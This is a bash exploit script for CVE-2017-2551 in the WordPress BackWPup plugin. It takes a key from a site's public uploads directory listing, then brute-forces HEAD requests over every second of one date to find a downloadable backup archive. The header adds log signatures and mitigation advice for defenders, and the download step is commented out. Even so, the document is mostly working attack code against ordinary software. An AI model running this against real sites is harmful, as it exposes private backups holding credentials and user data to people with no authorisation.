#!/bin/bash
# Exploit for WordPress plugin BackWPup v3.4.1
# Download https://wordpress.org/plugins/backwpup
# CVE-ID: CVE-2017-2551
#
# Purpose: shows that a BackWPup backup archive can be located by guessing its
# file name. The script reads the per-site key from the public index of
# /wp-content/uploads/, builds the backup directory and file prefix from it,
# then sends one HEAD request for every HH-MM-SS of a single hard-coded date
# (24 * 60 * 60 = 86400 candidates) until one response looks like a hit.
#
# Arguments: $1 - host name of the site (used as http://$1/...)
# Requires:  curl, html2text, grep, awk, bc, seq
#
# Defender notes:
#  - Exposure rests on two things visible below: the uploads directory index
#    is readable (that is where the key is taken from), and the archive name
#    is key + "01" + date + time, so only the time of day has to be guessed.
#  - In access logs this appears as one GET of /wp-content/uploads/ followed
#    by a long sequential run of HEAD requests for
#    backwpup_<key>01_<date>_<HH-MM-SS>.zip, nearly all of them misses.
#  - Mitigation: disable directory indexing for wp-content/uploads, deny web
#    access to the backup folder or keep backups outside the web root, and
#    update the plugin to a release that addresses the CVE named above
#    (check the vendor advisory for the version).
#
# Sample output:
#[+] Getting Unique Key 57d054
#[+] Checking directory backwpup-57d054-backups
#[+] Creating Path: backwpup-57d054-backups/backwpup_57d054
#[+] Scanning website for available backups:
#http://example.com/wp-content/uploads/backwpup-57d054-backups/backwpup_57d05401_2017-09-09_11-39-51.zip 48.00%
#[+] Location http://example.com/wp-content/uploads/backwpup-57d054-backups/backwpup_57d05401_2017-09-09_11-39-52.zip Found
#[+] Received HTTP/1.1 200 OK
#Downloading......
#
# Author TODO: add banner about vulnerability

# Fetch the uploads directory index, convert it to text, keep the line(s)
# containing "backups" and take the second '-'-separated field as the key
# (for "backwpup-57d054-backups" that is "57d054").
KEY=`curl --silent http://$1/wp-content/uploads/|html2text |grep backups | awk -F- '{print $2}'`
# Author TODO: add error checking here. As written, KEY is used even when the
# listing is unavailable or contains no matching line.
echo "[+] Getting Unique Key $KEY"
# Backup directory name derived from the key.
DIR="backwpup-$KEY-backups"
echo "[+] Checking directory $DIR"
# Directory plus the file-name prefix shared by every candidate archive.
WPATH="$DIR/backwpup_$KEY"
echo "[+] Creating Path: $WPATH"
# Author TODO: use date command here for the default date of current day.
# The date searched is fixed to 2017-09-09 in this version.
MONTH=09
DAY=09
YEAR=2017
# Z counts the candidates tried so far; it feeds the progress percentage.
Z=0
echo "[+] Scanning website for available backups:"
# y = hour (00-23), x = minute (00-59), z = second (00-59); seq -w zero-pads.
for y in `seq -w 0 23`; do
for x in `seq -w 0 59`; do
# Progress in percent, recomputed once per minute; the divisor is 86000.
Y=`echo "scale=2;($Z/86000)*100"|bc`;
for z in `seq -w 0 59`; do
# Backspaces overwrite the previous status line; CWPATH here still holds the
# URL from the previous iteration (empty on the very first pass).
echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CWPATH $Y%"
Z=$(( $Z + 1 ));
# Candidate URL: prefix + "01" + _YYYY-MM-DD_HH-MM-SS.zip
CWPATH="http://$1/wp-content/uploads/$WPATH"01"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";
# HEAD request only; RESULT is non-empty when any response header line
# contains "200".
RESULT=`curl -s --head $CWPATH|grep 200`;
if [ -n "$RESULT" ]; then
echo ""
echo "[+] Location $CWPATH Found";
echo "[+] Received $RESULT";
echo "Downloading......";
# The download itself is commented out; this version only reports the URL.
# wget $CWPATH
# Stop at the first match.
exit;
fi;
done
done
done
# Reached only when no candidate for the configured date matched.
echo "Completed."